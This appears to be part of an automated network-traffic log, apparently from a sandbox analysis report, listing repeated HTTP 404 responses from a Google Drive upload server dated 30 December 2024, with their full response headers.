                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Jxj33CMvYgY6WxJPNRmTbrlQkYjHn65iN8Te2UNTUOInC9jezsvQDNhvCuNVT5iD6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:03 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5F4VaxH1tFbqw9Bc46T6yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=lqGyQnCJXWjDSGUEWiIajQ0XjZxRCPhH84YYK9o2cwWZrWEcNkJK4AyOu_hyvE_rzZg-Yt5R8VIa34x1cHctiOjNuRSZvFbJhVR-ErtXB6BV_AsLOBbx7sJzJvxJRa4RXEbZ_fgwAaojQkMsV8sy7Hi_1vcWB1jaTvIf58DtEOjoVgMaOlNwSag; expires=Tue, 01-Jul-2025 10:51:03 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7WPcdiOrjc20GeDpPmAtGUPAJIxIg03RwQDnxvaaxt5DpFDEFCYPrQcuxC332mRBq7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:03 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-odeDIZaLeTm6oMc0cD3Lyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj; expires=Tue, 01-Jul-2025 10:51:03 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5g9OX2jaA4ulmOZG9qTReqoSMV62jdA7AV2jw4BAiKyQuXAESo9JUe4Ve8-Mc7w0EhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:04 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-4YIXQAyAMZAjmF7G3Ailsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5y8MZPPKPEQRZfz4m49TkBYOa0L6yMkzLCDzp2wuLQ5kER3qTqzXDsTMHFrf9FdIQhsD7mB-cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:04 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce--aj76B1TIcHe6P-bf90SXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4jYI_DqecVR8zrhTBB8Ekh4HjEBow8fRm6FOrPwOhSsW4YeC_iq3Oiz0TUvfTGMiTDe4KyuNUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wHrGWf-Ul6FiAUncUIGEWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4iRC7a176RbOnaVsoRVPnlIBPwCSrLTRXCH6khei1WV6jOBASbiRTFBA7Fy6h2IqjSYxh8Z94Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:07 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-09iRPO4ZN4K3ceYIt8wz9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6yC7F82ZOsHlSknNnULOntTIJxDL73T9tEi7uxi1bfLY17BpuQ_kGX_3MkSuaW4wO6S2LFLXcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CIgWd-EaZoqUqcPSee4zCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5wEnMbzKEtepjyjLg6pygOFK6Szddp_MLcR8cl3bBMyGXSHCrZ8gZM59WgzdWPPkX20dojiwEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-DEym99Z-dyPpLM29TlMTtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4CwuPgY5GYgIicZUXy8YjUtoWrUUMrFhVoaETNpDFSRAHufQgnrpLXWJLgPDvsxKDlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:09 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CamNezxI1kin1BxaS9MhsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mKpEeIgk6bNDGEG4TXstgyEwMuM0KBIWaTPY6wwwTGMm3GWGNZzXoHSaSYRi7LvLoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:10 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OaRRsahoqkSuqsdJ9QOM_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mdZHZVMcPaabbSsHAHD0OvbsGFuKUSVCqqovDXfSBWvikhNQfgqKm2mTH2zs__63-0AQBxsIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:10 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U5gi83feaSMo0PDTfDSA_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bEe6qFJ4wXzFo13yz72806FfsyvYVNqtF5LBh_pJ6BRD0hqcXh1VeRR1MXvtRqMYcpHRR5HEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:11 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Z47sSC0vBrXnPrD6MAJGHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6b-JUp5DhulV0t385j-DzczO15Chdbayjw6A-6Ygyr1K_eTqq33dZlLaeAm8vQOeeFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:11 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-054_2RfPIxRIgBxrki0b8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7dr2hh2geiD-DayahNTyJfr6aTD0wyqoCDeRygh9wfGKu7rp-CDD8hKH-sEVgj2lrUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7kV0wjeYvlWSzwqQq-_Lkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7LnRG-HYU-_3OXlcAea6-9Vk-qkv6grYhQUNzmHiESHvOhh7Pz_0HOS_AYZeOnoIVLOD0wS_4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:51 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-w4UTtfF_OFlSSuzOegukeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OpGdbt2-KFy2G03WtJMpr4YbciZ26dtb1aIC9ncHJdBCPmuly7rf1X1gNgoPeHalMDrc4gVEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:52 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-QgMhFOMmq5bjXQb7-riXCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6FvQeD8DIlMjcme3uZzqJ27QFk7XFpJng9PVm9o3QNPEzfZniSkgqCXE5W_AEcG2EFJINMTMgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6W3gxUhtAqdp3Z1-PDcXCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC48Ntr54edbBmEJSFVocgyN2eWoziBJY7sPrSK4W0S2f5Uo64I-UfA4R3i1yROaGnLpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:55 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-64kxkWckZSIGZVoTxpTa_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5HEP_z-8v2WO3-6Kk1YlU0D-Vfe40H9KkSIJ4xY50cX8NtyuTcFOurU6gjz4ERhilzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:55 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-dSI5G8QlmZ8ns9xYQ26UNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
